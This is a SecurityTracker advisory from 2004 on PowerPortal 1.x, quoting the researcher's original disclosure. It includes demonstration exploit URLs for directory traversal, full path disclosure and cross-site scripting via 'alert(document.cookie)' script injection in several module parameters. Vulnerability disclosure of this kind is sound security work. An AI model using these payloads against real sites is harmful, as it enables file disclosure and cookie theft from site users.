PowerPortal Input Validation Flaws Disclose Files to Remote Users and Permit Cross-Site Scripting Attacks
|
|
SecurityTracker Alert ID: 1010596
|
|
SecurityTracker URL: http://securitytracker.com/id?1010596
|
|
CVE Reference: CAN-2004-0662
, CAN-2004-0663
, CAN-2004-0664
(Links to External Site)
|
Updated: Jul 15 2004
|
Original Entry Date: Jun 28 2004
|
Impact: Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
|
Exploit Included: Yes
|
Version(s): 1.x
|
Description: DarkBicho reported a vulnerability in PowerPortal. A remote user can view files on the target system. A remote user can conduct cross-site scripting attacks and can also determine the installation path.
It is reported that the gallery module does not properly validate user-supplied input in the 'files' parameter. A remote user can
supply a specially crafted URL containing '../' directory traversal characters to view files on the target system with the privileges
of the target web service [CVE: CAN-2004-0664]. A demonstration exploit URL is provided:
http://[target]/modules.php?name=gallery&files=/../../../
It
is also reported that a remote user can determine the installation path [CVE: CAN-2004-0662]. Some demonstration exploit URLs are
provided:
http://[target]/modules/gallery/resize.php
http://[target]/power/modules.php?name=gallery&files=darkbicho
It
is also reported that various modules do not filter HTML code from user-supplied input before displaying the input [CVE: CAN-2004-0663].
A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be
executed by the target user's browser. The code will originate from the site running the PowerPortal software and will run in the
security context of that site. As a result, the code will be able to access the target user's cookies (including authentication
cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take
actions on the site acting as the target user.
Some demonstration exploit URLs are provided:
http://[target]/modules.php?name=private_messages&file=reply&id='><scri
pt>alert(document.cookie);</script>
http://[target]/modules.php?name=links&search=<script>alert(document.cookie);</script>&func=search_results
http://[target]/modules.p
hp?name=content&file=search&search=<script>alert(document.cookie);</script>&func=results
http://[target]/modules.php?name=gallery&files=<script>alert(document.cookie);</
script>
The vendor has reportedly been notified.
The original advisory is available at:
http://www.swp-zone.org/archivos/advisory-07.txt
|
Impact: A remote user can view files on the target system with the privileges of the target web service.
A remote user can determine the
installation path.
A remote user can access the target user's cookies (including authentication cookies), if any, associated
with the site running the PowerPortal software, access data recently submitted by the target user via web form to the site, or take
actions on the site acting as the target user.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: powerportal.sourceforge.net/ (Links to External Site)
|
Cause: Access control error, Input validation error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: DarkBicho <darkbicho@fastmail.fm>
|
Message History:
None.
|
Source Message Contents
|
Date: Sun, 27 Jun 2004 17:42:10 -0700
From: DarkBicho <darkbicho@fastmail.fm>
Subject: Multiple vulnerabilities PowerPortal
|
http://www.swp-zone.org/archivos/advisory-07.txt
-------------------------------------------------------------------------------------------------
:.: Multiple vulnerabilities PowerPortal :.:
PROGRAM: PowerPortal
HOMEPAGE: http://powerportal.sourceforge.net/
VERSION: v1.x
BUG: Multiple vulnerabilities
DATE: 23/05/2004
AUTHOR: DarkBicho
web: http://www.darkbicho.tk
team: Security Wari Proyects <www.swp-zone.org>
Email: darkbicho@peru.com
-------------------------------------------------------------------------------------------------
1.- Affected software description:
------------------------------
PowerPortal is a popular content management system, written in php
2.- Vulnerabilities:
---------------
A. Full path disclosure:
This vulnerability would allow a remote user to determine the full
path to the web root directory and other potentially sensitive
information.
:.: Examples:
* http://attacker/modules/gallery/resize.php
<br />
<b>Warning</b>: imagecreatetruecolor(): Invalid image dimensions in
<b>c:\appserv\www\power\modules\gallery\resize.php</b> on line
<b>18</b><br />
<br />
<b>Warning</b>: imagecopyresized(): supplied argument is not a
valid Image resource in
<b>c:\appserv\www\power\modules\gallery\resize.php</b> on line
<b>20</b><br />
<br />
<b>Warning</b>: imagejpeg(): supplied argument is not a valid Image
resource in
<b>c:\appserv\www\power\modules\gallery\resize.php</b> on line
<b>23</b><br />
* http://attacker/power/modules.php?name=gallery&files=darkbicho
Warning:
opendir(c:\appserv\www\power\modules\gallery/../../modules/gallery/images/darkbicho):
failed to open dir: Invalid argument in
c:\appserv\www\power\modules\gallery\index.php on
line 99
B. Cross-Site Scripting aka XSS:
http://attacker/modules.php?name=private_messages&file=reply&id='><script>alert(docu
ment.cookie);</script>
http://attacker/modules.php?name=links&search=<script>alert(document.cookie);</script>&
func=search_results
http://attacker/modules.php?name=content&file=search&search=<script>alert(document.cook
ie);</script>&func=results
http://attacker/modules.php?name=gallery&files=<script>alert(document.cookie);</script>
C. Arbitrary directory browsing:
* http://attacker/modules.php?name=gallery&files=/../../../
3.- SOLUTION:
จจจจจจจจ
Vendors were contacted many weeks ago and plan to release a fixed
version soon.
Check the PowerPortal website for updates and official release
details.
4.- Greetings:
---------
greetings to my Peruvian group swp and perunderforce :D
"EL PISCO ES Y SERA PERUANO"
5.- Contact
-------
WEB: http://www.darkbicho.tk
EMAIL: darkbicho@peru.com
-------------------------------------------------------------------------------------------------
___________ ____________
/ _____/ \ / \______ \
\_____ \\ \/\/ /| ___/
/ \\ / | |
/_______ / \__/\ / |____|
\/ \/
Security Wari Projects
(c) 2002 - 2004
Made in Peru
----------------------------------------[ EOF
]----------------------------------------------
DarkBicho
Web: http://www.darkbicho.tk
"Mi unico delito es ver lo que otros no pueden ver"
---------------------- The End ----------------------
|
|
